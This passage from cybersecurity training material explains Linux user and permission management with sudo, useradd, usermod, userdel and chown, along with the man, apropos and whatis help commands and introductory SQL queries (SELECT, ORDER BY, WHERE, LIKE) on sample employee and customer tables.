should no longer have access to any part of the system. Or if they simply changed groups, they
should be deleted from groups that they are no longer a part of. Now that we've sorted out why it's
important to add and delete users, let's discuss a different type of user, the root user. A root user, or
superuser, is a user with elevated privileges to modify the system. Regular users have limitations,
where the root does not. Individuals who need to perform specific tasks can be temporarily added
as root users. Root users can create, modify, or delete any file and run any program. Only root users
or accounts with root privileges can add new users. So you may be wondering how you become a
superuser. Well, one way is logging in as the root user, but running commands as the root user is
considered to be bad practice when using Linux. Why is running commands as a root user
potentially problematic? The first problem with logging in as root is the security risks. Malicious
actors will try to breach the root account. Since it's the most powerful account, to stay safe, the root
account should have logins disabled. Another problem is that it's very easy to make irreversible
mistakes. It's very easy to type the wrong command in the CLI, and if you're running as the root
user, you run a higher risk of making an irreversible mistake, such as permanently deleting a
directory. Finally, there's the concern of accountability. In a multi-user environment like Linux,
there are many users. If a user is running as root, there is no way to track who exactly ran a
command. One solution to help solve this problem is sudo. sudo is a command that temporarily
grants elevated permissions to specific users. This provides more of a controlled approach
compared to root, which runs every command with root privileges. sudo solves lots of problems
associated with running as root. sudo comes from super-user-do and lets you execute commands as
an elevated user without having to sign in and out of another account. Running sudo will prompt
you to enter the password for the user you're currently logged in as. Not all users on a system can
become a superuser. Users must be granted sudo access through a configuration file called the
sudoers file. Now that we've learned about sudo, let's learn how we can use it with another
command to add users. This command is useradd. useradd adds a user to the system. Only root or
users with sudo privileges can use the useradd command. Let's look at a specific example in which we
need to add a user. We'll imagine a new representative is joining the sales department and will be
given the username of salesrep7. We're tasked with adding them to the system. Let's try adding the
new user. First, we need to use the sudo command, followed by the useradd command, and then
last, the username we want to add, in this case, salesrep7. This command doesn't display anything
on the screen. But since we get a new Bash cursor and not an error message, we can feel confident
that the command worked successfully. If it didn't, an error message would have appeared.
Sometimes an error has to do with something simple like misspelling useradd. Or, it might be
because we didn't have sudo privileges. Now let's learn how to do the opposite. Let's learn how to
delete a user with userdel. userdel deletes a user from the system. Similarly, we need root
permissions that we'll access through sudo to use userdel. Let's go back to our example of the user
we added. Let's imagine two months later, the sales representative that we just added to the system
leaves the company. That user should no longer have access to the system. Let's delete that user
from the system. Again, the sudo command is used first, then we add the userdel command. Last, we
add the name of the user we want to delete. Again, we know it ran successfully because there is a
new Bash cursor and not an error message. Now, we've covered how to add and delete users and
how these actions require sudo. When using sudo, we have to use our best judgment. These special
privileges must be used responsibly to ensure a secure system.
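The video's example can be sketched as follows. The useradd and userdel lines require root privileges, so they are shown commented out; checking /etc/passwd is one way to confirm whether an account exists on the system.

```shell
# The user-management commands below need root, so they are commented out;
# run them with sudo on a system where you have that access.
# sudo useradd salesrep7   # add the new sales representative
# sudo userdel salesrep7   # remove the account when they leave

# One way to verify that an account exists is to search /etc/passwd.
# Here we check for root, which exists on every Linux system:
grep -c '^root:' /etc/passwd   # prints 1
```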
Responsible use of sudo
Previously, you explored authorization, authentication, and Linux commands with sudo, useradd, and
userdel. The sudo command is important for security analysts because it allows users to have elevated
permissions without risking the system by running commands as the root user. You’ll continue
exploring authorization, authentication, and Linux commands in this reading and learn two more
commands that can be used with sudo: usermod and chown.
Responsible use of sudo
To manage authorization and authentication, you need to be a root user, or a user with elevated
privileges to modify the system. The root user can also be called the “super user.” You become a root
user by logging in as the root user. However, running commands as the root user is not recommended in
Linux because it can create security risks if malicious actors compromise that account. It’s also easy to
make irreversible mistakes, and the system can’t track who ran a command. For these reasons, rather
than logging in as the root user, it’s recommended you use sudo in Linux when you need elevated
privileges.
The sudo command temporarily grants elevated permissions to specific users. The name of this
command comes from “super user do.” Users must be given access in a configuration file to use sudo.
This file is called the “sudoers file.” Although using sudo is preferable to logging in as the root user, it's
important to be aware that users with the elevated permissions to use sudo might be more at risk in the
event of an attack.
You can compare this to a hotel with a master key. The master key can be used to access any room in the
hotel. There are some workers at the hotel who need this key to perform their work. For example, to
clean all the rooms, the janitor would scan their ID badge and then use this master key. However, if
someone outside the hotel’s network gained access to the janitor’s ID badge and master key, they could
access any room in the hotel. In this example, the janitor with the master key represents a user using
sudo for elevated privileges. Because of the dangers of sudo, only users who really need to use it should
have these permissions.
Additionally, even if you need access to sudo, you should be careful about using it with only the
commands you need and nothing more. Running commands with sudo allows users to bypass the typical
security controls that are in place to prevent elevated access to an attacker.
Note: Be aware of sudo if copying commands from an online source. It’s important you don’t use sudo
accidentally.
Authentication and authorization with sudo
You can use sudo with many authentication and authorization management tasks. As a reminder,
authentication is the process of verifying who someone is, and authorization is the concept of granting
access to specific resources in a system. Some of the key commands used for these tasks include the
following:
useradd
The useradd command adds a user to the system. To add a user with the username of fgarcia with sudo,
enter sudo useradd fgarcia. There are additional options you can use with useradd:
● -g: Sets the user’s default group, also called their primary group
● -G: Adds the user to additional groups, also called supplemental or secondary groups
To use the -g option, the primary group must be specified after -g. For example, entering sudo useradd -g
security fgarcia adds fgarcia as a new user and assigns their primary group to be security.
To use the -G option, the supplemental group must be passed into the command after -G. You can add
more than one supplemental group at a time with the -G option. Entering sudo useradd -G finance,admin
fgarcia adds fgarcia as a new user and adds them to the existing finance and admin groups.
usermod
The usermod command modifies existing user accounts. The same -g and -G options from the useradd
command can be used with usermod if a user already exists.
To change the primary group of an existing user, you need the -g option. For example, entering sudo
usermod -g executive fgarcia would change fgarcia’s primary group to the executive group.
To add a supplemental group for an existing user, you need the -G option. You also need a -a option,
which appends the user to an existing group and is only used with the -G option. For example, entering
sudo usermod -a -G marketing fgarcia would add the existing fgarcia user to the supplemental marketing
group.
Note: When changing the supplemental group of an existing user, if you don't include the -a option, -G
will replace any existing supplemental groups with the groups specified after usermod. Using -a with -G
ensures that the new groups are added but existing groups are not replaced.
There are other options you can use with usermod to specify how you want to modify the user, including:
● -d: Changes the user’s home directory.
● -l: Changes the user’s login name.
● -L: Locks the account so the user can’t log in.
The option always goes after the usermod command. For example, to change fgarcia’s home directory to
/home/garcia_f, enter sudo usermod -d /home/garcia_f fgarcia. The option -d directly follows the command
usermod before the other two needed arguments.
userdel
The userdel command deletes a user from the system. For example, entering sudo userdel fgarcia deletes
fgarcia as a user. Be careful before you delete a user using this command.
The userdel command doesn’t delete the files in the user’s home directory unless you use the -r option.
Entering sudo userdel -r fgarcia would delete fgarcia as a user and delete all files in their home directory.
Before deleting any user files, you should ensure you have backups in case you need them later.
Note: Instead of deleting the user, you could consider deactivating their account with usermod -L. This
prevents the user from logging in while still giving you access to their account and associated
permissions. For example, if a user left an organization, this option would allow you to identify which
files they have ownership over, so you could move this ownership to other users.
chown
The chown command changes ownership of a file or directory. You can use chown to change user or
group ownership. To change the user owner of the access.txt file to fgarcia, enter sudo chown fgarcia
access.txt. To change the group owner of access.txt to security, enter sudo chown :security access.txt. You
must enter a colon (:) before security to designate it as a group name.
Similar to useradd, usermod, and userdel, there are additional options that can be used with chown.
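A short sketch of chown follows. Changing the user owner normally requires sudo, so that line is shown commented out; changing the group owner of a file you own to a group you already belong to works without elevated privileges, which makes it easy to try. The filename matches the reading's access.txt example.

```shell
# Sketch: chown on a scratch copy of access.txt.
cd "$(mktemp -d)"
touch access.txt

# Changing the user owner requires elevated privileges, so it is commented out:
# sudo chown fgarcia access.txt

# The colon designates a group name. Here we use our own primary group,
# a change we are allowed to make without sudo:
chown ":$(id -gn)" access.txt
stat -c '%G' access.txt   # prints your primary group's name
```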
Key takeaways
Authentication is the process of a user verifying their identity, and authorization is the process of
determining what they have access to. You can use the sudo command to temporarily run commands
with elevated privileges to complete authentication and authorization management tasks. Specifically,
useradd, userdel, usermod, and chown can be used to manage users and file ownership.
The Linux Community
Man pages within the shell
Welcome back! In this video, we're going to discuss some resources that are available directly
through the shell and can help you while working in Linux. One of the great things about Linux is
that you can get help right through the command line. The first command that can help you in this
way is: man. man displays information on other commands and how they work. The name of this
command comes from the word manual. Let's examine this more closely by using man to get
information about the usermod command. After man, we type the name of this command. The
information that man returns includes a general description. It also contains information about
each of usermod's options. For example, the option -d can be added to usermod to change a user's
home directory. man provides a lot of information, but sometimes we just need a quick reference on
what a command does. In that case, you use whatis. whatis displays a description of a command on
a single line. Let's say you heard a co-worker mention a command like tail. You've never heard of
this command before, but you can find out what it does. Simply use the command, whatis tail, and
learn that it outputs the last part of files. Sometimes we might not even know what command to
look up. This is where apropos can help us. apropos searches the manual page descriptions for a
specified string. Let's try it out. Let's say you have a task that requires you to change a password,
but you're not quite sure how to do this. If we use the apropos command with the string password,
this will display many commands with that word. This helps somewhat, but it still may be difficult
to find what we need. But we can filter this by adding the -a option and an additional string. This
option will return only the commands that contain both strings. In our case, since we want to
change the password, let's look for commands with both: change and password. Now, the output
has been limited to the most relevant commands. These commands make it a lot easier to navigate
the Linux command line. As a new analyst, you won't have all the answers all the time, but you can
learn where to find them.
Linux resources
Previously, you were introduced to the Linux community and some resources that exist to help Linux
users. Linux has many options available to give users the information they need. This reading will
review these resources. When you’re aware of the resources available to you, you can continue to learn
Linux independently. You can also discover even more ways that Linux can support your work as a
security analyst.
Linux community
Linux has a large online community, and this is a huge resource for Linux users of all levels. You can
likely find the answers to your questions with a simple online search. Troubleshooting issues by
searching and reading online is an effective way to discover how others approached your issue. It’s also
a great way for beginners to learn more about Linux.
The Unix and Linux Stack Exchange is a trusted resource for troubleshooting Linux issues. It is a question-and-answer website where community members can ask and answer questions about Linux. Community members vote on answers, so the higher-quality answers are displayed at the top. Many of the questions are related to specific topics from advanced users, and the topics might help you troubleshoot issues as you continue using Linux.
Integrated Linux support
Linux also has several commands that you can use for support.
man
The man command displays information on other commands and how they work. It’s short for “manual.”
To search for information on a command, enter the command after man. For example, entering man
chown returns detailed information about chown, including the various options you can use with it. The
output of the man command is also called a “man page.”
apropos
The apropos command searches the man page descriptions for a specified string. Man pages can be
lengthy and difficult to search through if you’re looking for a specific keyword. To use apropos, enter the
keyword after apropos.
You can also include the -a option to search for multiple words. For example, entering apropos -a graph
editor outputs man pages that contain both the words “graph" and "editor” in their descriptions.
whatis
The whatis command displays a description of a command on a single line. For example, entering whatis
nano outputs the description of nano. This command is useful when you don't need a detailed
description, just a general idea of the command. This might be as a reminder. Or, it might be after you
discover a new command through a colleague or online resource and want to know more.
Key takeaways
There are many resources available for troubleshooting issues or getting support for Linux. Linux has a
large global community of users who ask and answer questions on online resources, such as the Unix
and Linux Stack Exchange. You can also use integrated support commands in Linux, such as man,
apropos, and whatis.
Resources for more information
There are many resources available online that can help you learn new Linux concepts, review topics, or
ask and answer questions with the global Linux community. The Unix and Linux Stack Exchange is one
example, and you can search online to find others.
Reference guide: Linux
The Linux reference guide contains key Linux commands security professionals use to
perform basic job duties. The reference guide is divided into six different categories of
useful Linux commands for security-related tasks:
● Navigate the file system
● Read files
● Manage the file system
● Filter content
● Manage users and their permissions
● Get help in Linux
Within each category, commands are organized alphabetically.
Access and save the guide
You can save a copy of this guide for future reference. You can use it as a resource for
additional practice or in your future professional projects.
To access a downloadable version of this course item, click the following link and select Use
Template.
Reference guide: Linux
Glossary terms from module 3
Terms and definitions from Course 4, Module 3
Absolute file path: The full file path, which starts from the root
Argument (Linux): Specific information needed by a command
Authentication: The process of verifying who someone is
Authorization: The concept of granting access to specific resources in a system
Bash: The default shell in most Linux distributions
Command: An instruction telling the computer to do something
File path: The location of a file or directory
Filesystem Hierarchy Standard (FHS): The component of the Linux OS that organizes data
Filtering: Selecting data that match a certain condition
nano: A command-line file editor that is available by default in many Linux distributions
Options: Input that modifies the behavior of a command
Permissions: The type of access granted for a file or directory
Principle of least privilege: The concept of granting only the minimal access and authorization required
to complete a task or function
Relative file path: A file path that starts from the user's current directory
Root directory: The highest-level directory in Linux
Root user (or superuser): A user with elevated privileges to modify the system
Standard input: Information received by the OS via the command line
Standard output: Information returned by the OS through the shell
Module 4 – SQL and Databases
Our modern world is filled with data, and that data almost always guides us
in making important decisions. When working with large amounts of data,
we need to know how to store it, so it's organized and quick to access and process. The solution to
this is through databases, and that's what we're exploring in this video! To start us off, we can
define a database as an organized collection of information or data. Databases are often compared
to spreadsheets. Some of you may have used Google Sheets or another common spreadsheet
program in the past. While these programs are convenient
ways to store data, spreadsheets are often designed for a single user or a small team to store less
data. In contrast, databases can be accessed by multiple people simultaneously and can store
massive amounts of data. Databases can also perform complex tasks while accessing data. As a
security analyst, you'll often need to access databases containing useful information. For example,
these could be databases containing information on login attempts, software and updates, or
machines and their owners. Now that we know how important databases are for us, let's talk about
how they're organized and how we can interact with them. Using databases allows us to store large
amounts of data while keeping it quick and easy to access. There are lots of different ways we can
structure a database, but in this course, we'll be working with
relational databases. A relational database is a structured database containing tables that are related
to each other. Let's learn more about what makes a relational database. We'll start by examining an
individual table in a larger database of organizational information. Each table contains fields of
information. For example, in this table on employees, these would include fields like employee_id,
device_id, and username. These are the columns of the tables. In addition, tables contain rows also
called records. Rows are filled with specific data related to the columns in the table. For example,
our first row is a record for an employee whose id is 1,000 and who works in the marketing
department. Relational databases often have multiple tables. Consider an example where we have
two tables from a larger database, one with employees of the company and another with machines
given to those employees. We can connect two tables if they share a common column. In this
example, we establish a relationship between them with a common employee_id column. The
columns that relate two tables to each other are called keys. There are two types of keys. The first is
called a primary key. The primary key refers to a column where every row has a unique entry. The
primary key must not have any duplicate values, or any null or empty values. The primary key allows
us to uniquely identify every row in our table. For the table of employees, employee_id is a primary
key. Every employee_id is unique and there are no employee_ids that are duplicate or empty. The
second type of key is a foreign key. The foreign key is a column in a table that is a primary key in
another table. Foreign keys, unlike primary keys, can have empty values and duplicates. The foreign
key allows us to connect two tables together. In our example, we can look at the employee_id
column in the machines table. We previously identified this as a primary key in the employees table,
so we can use this to connect every machine to their corresponding employee. It's also important to
know that a table can only have one primary key, but multiple foreign keys. With this information,
we're ready to move on to the basics of SQL, the language that lets us work with databases.
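The relationship between the two example tables could be declared as follows. This is a sketch, not the course's actual schema: the employees columns come from the video, but the machines table's operating_system column and the VARCHAR sizes are invented for illustration, and exact syntax varies slightly between SQL versions.

```sql
-- Illustrative schema for the video's two example tables.
CREATE TABLE employees (
    employee_id INTEGER PRIMARY KEY,  -- primary key: unique, never null
    device_id   VARCHAR(20),
    username    VARCHAR(50),
    department  VARCHAR(50)
);

CREATE TABLE machines (
    device_id        VARCHAR(20) PRIMARY KEY,  -- a table has only one primary key
    operating_system VARCHAR(50),              -- invented column for illustration
    employee_id      INTEGER,                  -- foreign key: duplicates and nulls allowed
    FOREIGN KEY (employee_id) REFERENCES employees (employee_id)
);
```

The FOREIGN KEY clause is what connects each machine back to its corresponding employee through the shared employee_id column.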
Query Databases with SQL
As a security analyst, you'll need to be familiar both with databases and the tools used to access
them. Now that we know the basics of databases, let's focus on an important tool
used to work with them, SQL, and learn more about how analysts like yourself might utilize it. SQL
(pronounced "sequel," or spelled out as S-Q-L) stands for Structured Query Language. SQL is a programming
language used to create, interact with, and request information from a database. Before learning
more about SQL, we need to define what query means. A query is a request for data from a database
table or a combination of tables. Nearly all relational databases rely on some version of SQL to query
data. The different versions of SQL only have
slight differences in their structure, like where to place quotation marks. Whatever variety of SQL
you use, you'll find it to be a very important tool in your work as a security analyst. First, let's
discuss how SQL can help you retrieve logs. A log is a record of events that occur
within an organization's systems. As a security analyst, you might be tasked with reviewing logs for
various reasons. For example, some logs might contain details on machines used in a company, and
as an analyst, you would need to find those machines that weren't configured properly. Other logs
might describe the visitors to your website or web app and the tasks they perform. In that case, you
might be looking for unusual patterns that may point to malicious activity. Security logs are often
very large and hard to process. There are millions of data points, and it's very time consuming to
find what you need. But this is where SQL comes in! It can
search through millions of data points to extract relevant rows of data using one query that takes
seconds to run. That's pretty useful, right? SQL is also a very common language used for basic data
analytics, another set of skills that will set you apart as a security analyst. As a security analyst, you
can use SQL's filtering to find data to support security-related decisions and analyze when things
may go wrong. For instance, you can identify what machines haven't received the latest patch. This
is important because patches are updates that help secure against attacks. As another example, you
can use SQL to determine the best time to update a machine based on when it's least used. Now that
we know why SQL is important to us, we're going to start making basic queries to a sample
database!
SQL filtering versus Linux filtering
Previously, you explored the Linux commands that allow you to filter for specific information contained
within files or directories. And, more recently, you examined how SQL helps you efficiently filter for the
information you need. In this reading, you'll explore differences between the two tools as they relate to
filtering. You'll also learn that one way to access SQL is through the Linux command line.
Accessing SQL
There are many interfaces for accessing SQL and many different versions of SQL. One way to access SQL
is through the Linux command line.
To access SQL from Linux, you need to type in a command for the version of SQL that you want to use.
For example, if you want to access SQLite, you can enter the command sqlite3 in the command line.
After this, any commands typed in the command line will be directed to SQL instead of Linux commands.
Differences between Linux and SQL filtering
Although both Linux and SQL allow you to filter through data, there are some differences that affect
which one you should choose.
Structure
SQL offers a lot more structure than Linux, which is more free-form and not as tidy.
For example, if you wanted to access a log of employee log-in attempts, SQL would have each record
separated into columns. Linux would print the data as a line of text without this organization. As a result,
selecting a specific column to analyze would be easier and more efficient in SQL.
In terms of structure, SQL provides results that are more easily readable and that can be adjusted more
quickly than when using Linux.
Joining tables
Some security-related decisions require information from different tables. SQL allows the analyst to join
multiple tables together when returning data. Linux doesn’t have that same functionality; it doesn’t
allow data to be connected to other information on your computer. This is more restrictive for an
analyst going through security logs.
Best uses
As a security analyst, it’s important to understand when you can use which tool. Although SQL has a
more organized structure and allows you to join tables, this doesn’t mean that there aren’t situations
that would require you to filter data in Linux.
A lot of data used in cybersecurity will be stored in a database format that works with SQL. However,
other logs might be in a format that is not compatible with SQL. For instance, if the data is stored in a
text file, you cannot search through it with SQL. In those cases, it is useful to know how to filter in Linux.
Key takeaways
To work with SQL, you can access it from multiple different interfaces, such as the Linux command line.
Both SQL and Linux allow you to filter for specific data, but SQL offers the advantages of structuring the
data and allowing you to join data from multiple tables.
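The difference described above is easy to see with a flat text log, which SQL cannot query directly. The log contents below are invented for illustration; grep filters whole lines of text, with no notion of named columns to select from.

```shell
# Invented flat-file log: Linux tools filter it line by line.
cd "$(mktemp -d)"
cat > login_attempts.txt <<'EOF'
2023-11-01 09:14 jdoe SUCCESS
2023-11-01 09:16 asmith FAILURE
2023-11-01 09:17 asmith FAILURE
2023-11-01 09:20 jdoe SUCCESS
EOF

# grep returns every matching line; there is no column structure to select from.
grep FAILURE login_attempts.txt
```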
Basic Queries
In this video, we're going to be running our very first SQL query! This query will be based on a
common work task that you might encounter as a security analyst. We're going to determine which
computer has been assigned to a certain employee. Let's say we have access
to the employees table. The employees table has five columns. Two of them, employee_id
and device_id, contain the information that we need. We'll write a query to this table that returns
only those two columns from the table. The two SQL keywords we need for basic SQL queries are
SELECT and FROM. SELECT indicates which columns to return. FROM indicates which table to query.
The use of these keywords in SQL is very similar to how we would use these words in everyday
language. For example, we can ask a friend to select apples and bananas from the big box when
going out to buy fruit. This is already very similar to SQL. So let's go ahead and use SELECT and
FROM in SQL to return the information we need on employees and the computers they use. We
start off by typing in the SQL statement. After FROM, we've identified that the information will be
pulled from the employees table. And after SELECT, employee_id and device_id indicate the two
columns we want to return from this table. Notice how a comma separates the two columns that we
want to return. It's also worth
mentioning a couple of key aspects related to the syntax of SQL here. Syntax refers to the
rules that determine what is correctly structured in a computing language. In SQL, keywords are not
case-sensitive, so you could also write select and from in lowercase, but we're placing them in
capital letters because it makes the query easier to understand. Another aspect of this syntax is that
semicolons are placed at the end of the statement. And now, we'll run the query by pressing Enter.
The output gives us the information we need to match employees to their computers. We just ran
our very first SQL query! Suppose you wanted to know what department the employee using the
computer is from, or their username, or the office they work in. To do that, we can use SQL to make
another statement that prints out all of the columns from the table. We can do this by placing an
asterisk after SELECT. This is commonly referred to as select all. Now, let's run this query on the
employees table in SQL. And now we have the full table in the output. You just made it through a
basic query in SQL, congratulations!
Query a database
Previously, you explored how SQL is an important tool in the world of cybersecurity and is essential
when querying databases. You examined a few basic SQL queries and keywords used to extract needed
information from a database. In this reading, you’ll review those basic SQL queries and learn a new
keyword that will help you organize your output. You'll also learn about the Chinook database, which
this course uses for queries in readings and quizzes.
Basic SQL query
There are two essential keywords in any SQL query: SELECT and FROM. You will use these keywords
every time you want to query a SQL database. Using them together helps SQL identify what data you
need from a database and the table you are returning it from.
The video demonstrated this SQL query:
SELECT employee_id, device_id
FROM employees;
In readings and quizzes, this course uses a sample database called the Chinook database to run queries.
The Chinook database includes data that might be created at a digital media company. A security analyst
employed by this company might need to query this data. For example, the database contains eleven
tables, including an employees table, a customers table, and an invoices table. These tables include data
such as names and addresses.
As an example, you can run this query to return data from the customers table of the Chinook database:
SELECT customerid, city, country
FROM customers;

+------------+---------------------+----------------+
| CustomerId | City                | Country        |
+------------+---------------------+----------------+
|          1 | São José dos Campos | Brazil         |
|          2 | Stuttgart           | Germany        |
|          3 | Montréal            | Canada         |
|          4 | Oslo                | Norway         |
|          5 | Prague              | Czech Republic |
|          6 | Prague              | Czech Republic |
|          7 | Vienne              | Austria        |
|          8 | Brussels            | Belgium        |
|          9 | Copenhagen          | Denmark        |
|         10 | São Paulo           | Brazil         |
|         11 | São Paulo           | Brazil         |
|         12 | Rio de Janeiro      | Brazil         |
|         13 | Brasília            | Brazil         |
|         14 | Edmonton            | Canada         |
|         15 | Vancouver           | Canada         |
|         16 | Mountain View       | USA            |
|         17 | Redmond             | USA            |
|         18 | New York            | USA            |
|         19 | Cupertino           | USA            |
|         20 | Mountain View       | USA            |
|         21 | Reno                | USA            |
|         22 | Orlando             | USA            |
|         23 | Boston              | USA            |
|         24 | Chicago             | USA            |
|         25 | Madison             | USA            |
+------------+---------------------+----------------+
(Output limit exceeded, 25 of 59 total rows shown)
SELECT
The SELECT keyword indicates which columns to return. For example, you can return the customerid
column from the Chinook database with
SELECT customerid
You can also select multiple columns by separating them with a comma. For example, if you want to
return both the customerid and city columns, you should write SELECT customerid, city.
If you want to return all columns in a table, you can follow the SELECT keyword with an asterisk (*). The
first line in the query will be SELECT *.
Note: Although the tables you're querying in this course are relatively small, using SELECT * may not be
advisable when working with large databases and tables; in those cases, the final output may be difficult
to understand and might be slow to run.
FROM
The SELECT keyword always comes with the FROM keyword. FROM indicates which table to query. To
use the FROM keyword, you should write it after the SELECT keyword, often on a new line, and follow it
with the name of the table you’re querying. If you want to return all columns from the customers table,
you can write:
SELECT *
FROM customers;
When you want to end the query here, you put a semicolon (;) at the end to tell SQL that this is the entire
query.
Note: Line breaks are not necessary in SQL queries, but are often used to make the query easier to
understand. If you prefer, you can also write the previous query on one line as
SELECT * FROM customers;
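If you want to experiment outside the course's interactive environment, the same queries can be run against SQLite from Python. The following sketch uses Python's built-in sqlite3 module and a small hypothetical customers table; the rows are invented stand-ins for the Chinook data, not the real dataset:

```python
import sqlite3

# Build a tiny in-memory database with a hypothetical customers table.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE customers (customerid INTEGER, city TEXT, country TEXT)")
con.executemany("INSERT INTO customers VALUES (?, ?, ?)", [
    (1, "São José dos Campos", "Brazil"),
    (2, "Stuttgart", "Germany"),
    (3, "Montréal", "Canada"),
])

# SELECT names the columns to return; FROM names the table to query.
for row in con.execute("SELECT customerid, city FROM customers"):
    print(row)

# SELECT * ("select all") returns every column in the table.
all_rows = con.execute("SELECT * FROM customers").fetchall()
print(all_rows)
```

Each row prints as a tuple, and swapping an explicit column list for the asterisk returns every column, just as described above.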
ORDER BY
Database tables are often very complicated, and this is where other SQL keywords come in handy.
ORDER BY is an important keyword for organizing the data you extract from a table.
ORDER BY sequences the records returned by a query based on a specified column or columns. This can
be in either ascending or descending order.
Sorting in ascending order
To use the ORDER BY keyword, write it at the end of the query and specify a column to base the sort on.
In this example, SQL will return the customerid, city, and country columns from the customers table, and
the records will be sequenced by the city column:
SELECT customerid, city, country
FROM customers
ORDER BY city;
The ORDER BY keyword sorts the records based on the column specified after this keyword. By default,
as shown in this example, the sequence will be in ascending order. This means
● if you choose a column containing numeric data, it sorts the output from the smallest to largest. For example, if sorting on customerid, the ID numbers are sorted from smallest to largest.
● if the column contains alphabetic characters, such as in the example with the city column, it orders the records from the beginning of the alphabet to the end.
Sorting in descending order
You can also use ORDER BY with the DESC keyword to sort in descending order. The DESC keyword is
short for "descending" and tells SQL to sort numbers from largest to smallest, or alphabetically from Z to
A. For example, you can run this query to examine how the results differ when DESC is applied:
SELECT customerid, city, country
FROM customers
ORDER BY city DESC;
Now, cities at the end of the alphabet are listed first.
Sorting based on multiple columns
You can also choose multiple columns to order by. For example, you might first choose the country and
then the city column. SQL then sorts the output by country, and for rows with the same country, it sorts
them based on city. You can run this to explore how SQL displays this:
SELECT customerid, city, country
FROM customers
ORDER BY country, city;
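As a quick way to verify the sorting behavior described above, here is a minimal sqlite3 sketch with a handful of made-up rows (the values are illustrative, not the Chinook data):

```python
import sqlite3

# Hypothetical customers table standing in for the Chinook data used in the reading.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE customers (customerid INTEGER, city TEXT, country TEXT)")
con.executemany("INSERT INTO customers VALUES (?, ?, ?)", [
    (1, "Oslo", "Norway"),
    (2, "Boston", "USA"),
    (3, "Chicago", "USA"),
    (4, "Prague", "Czech Republic"),
])

# Ascending is the default: cities sorted from A to Z.
asc = con.execute("SELECT city FROM customers ORDER BY city").fetchall()

# DESC reverses the sort: cities from Z to A.
desc = con.execute("SELECT city FROM customers ORDER BY city DESC").fetchall()

# Multiple columns: sort by country first, then by city within each country.
multi = con.execute("SELECT country, city FROM customers ORDER BY country, city").fetchall()
print(asc, desc, multi)
```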
Key takeaways
SELECT and FROM are important keywords in SQL queries. You use SELECT to indicate which columns to
return and FROM to indicate which table to query. You can also include ORDER BY in your query to
organize the output. These foundational SQL skills will support you as you move into more advanced
queries.
Basic Filters on SQL
One of the most powerful features of SQL is its ability to filter. In this video, we're going to learn
how this helps us make better queries and select more specific pieces
of data from a database. Filtering is selecting data that match a certain condition. Think of filtering as
a way of only choosing the data we want. Let's say we wanted to select
apples from a fruit cart. Filtering allows us to specify what kind of apples we want to choose. When
we go buy apples, we might explicitly say, "Choose only apples that are fresh." This removes apples
that aren't fresh from the selection. This is a filter! As a security analyst, you might filter a log-in
attempts table to find all attempts from a specific country. This could be done by applying a filter on
the country column. For example, you could filter to just
return records containing Canada. Before we get started, we need to focus on an
important part of the syntax of SQL. Let's learn about operators. An operator is a symbol or
keyword that represents an operation. An example of an operator would be the equal to operator.
For example, if we wanted to find all records that have USA in the country column, we use country
= 'USA'. To filter a query in SQL, we simply add an extra line to the SELECT and FROM statement we
used before. This extra line will use a WHERE clause. In SQL, WHERE indicates the condition for a
filter. After the keyword WHERE, the specific condition is listed using operators. So if we wanted to
find all of the login attempts made in the United States, we would create this filter. In this particular
condition, we're indicating to return all records that have a value in the country column that is
equal to USA. Let's try putting it all together in SQL. We're going to start with selecting all the
columns from the log_in_attempts table. And
then add the WHERE filter. Don't forget the semicolon! This tells us we finished
the SQL statement. Now, let's run this query! Because of our filter, only the rows where the country
of the log-in attempt was USA are returned. In the previous example, the condition for
our filter was based simply on returning records that are equal to a particular value. We can also
make our conditions more complex by searching for a pattern instead of an exact word. For
example, in the employees table, we have a column for office. We could search for records in this
column that match a certain pattern. Perhaps we might want all offices in the East building. To
search for a pattern, we use the percentage sign to act as a wildcard for unspecified characters. If
we ran a filter for 'East%', this would return all records that start with East -- for example, the
offices East-120, East-290, and East-435. When searching for patterns with the percentage sign, we
cannot use the equals operator. Instead, we use another operator, LIKE. LIKE is an operator used
with WHERE to search for a pattern in a column, and it takes the place of the equals sign in the
condition. So, when our goal is to return all values in the office column that
start with the word East, LIKE would appear in a WHERE clause. Let's go back to the example in
which we wanted to filter for log-in attempts made in the United States. Imagine that we realize
that our database contains inconsistencies with how the United States is represented. Some entries
use US while others use USA. Let's get into SQL and apply this new type of filter with LIKE. We're
going to start with the same first two lines of code because we want to select all columns from the
log-in attempts table. And we're going to add a filter with LIKE so that records will be returned if
they contain a value in the country column beginning with the characters US. This includes both US
and USA. Let's run this query to check if the output changes. This returns all the entries where the
user location
was in the United States. And now we can use the LIKE clause to filter columns based on a pattern!
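The video's log-in attempts example can be sketched the same way; the table and rows below are hypothetical stand-ins for the course's log_in_attempts data:

```python
import sqlite3

# Hypothetical log_in_attempts table; column names follow the video's example.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE log_in_attempts (username TEXT, country TEXT)")
con.executemany("INSERT INTO log_in_attempts VALUES (?, ?)", [
    ("elarson", "USA"),
    ("bmoreno", "US"),
    ("jclark", "Canada"),
])

# Exact match with the = operator returns only the rows where country is 'USA'.
usa = con.execute("SELECT * FROM log_in_attempts WHERE country = 'USA'").fetchall()

# LIKE with the % wildcard matches anything beginning with 'US': both 'US' and 'USA'.
us_like = con.execute("SELECT * FROM log_in_attempts WHERE country LIKE 'US%'").fetchall()
print(usa, us_like)
```

The equality filter misses the inconsistent 'US' entries, while the LIKE pattern catches both spellings.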
The WHERE clause and basic operators
Previously, you focused on how to refine your SQL queries by using the WHERE clause to filter results. In
this reading, you’ll further explore how to use the WHERE clause, the LIKE operator and the percentage
sign (%) wildcard. You’ll also be introduced to the underscore (_), another wildcard that can help you
filter queries.
How filtering helps
As a security analyst, you'll often be responsible for working with very large and complicated security
logs. To find the information you need, you'll often need to use SQL to filter the logs.
In a cybersecurity context, you might use filters to find the login attempts of a specific user or all login
attempts made at the time of a security issue. As another example, you might filter to find the devices
that are running a specific version of an application.
WHERE
To create a filter in SQL, you need to use the keyword WHERE. WHERE indicates the condition for a filter.
If you needed to email employees with a title of IT Staff, you might use a query like the one in the
following example. You can run this example to examine what it returns:
SELECT lastname, firstname, title, email
FROM employees
WHERE title = 'IT Staff';
Rather than returning all records in the employees table, this WHERE clause instructs SQL to return only
those that contain 'IT Staff' in the title column. It uses the equals sign (=) operator to set this condition.
Note: You should place the semicolon (;) where the query ends. When you add a filter to a basic query,
the semicolon is after the filter.
Filtering for patterns
You can also filter based on a pattern. For example, you can identify entries that start or end with a
certain character or characters. Filtering for a pattern requires incorporating two more elements into
your WHERE clause:
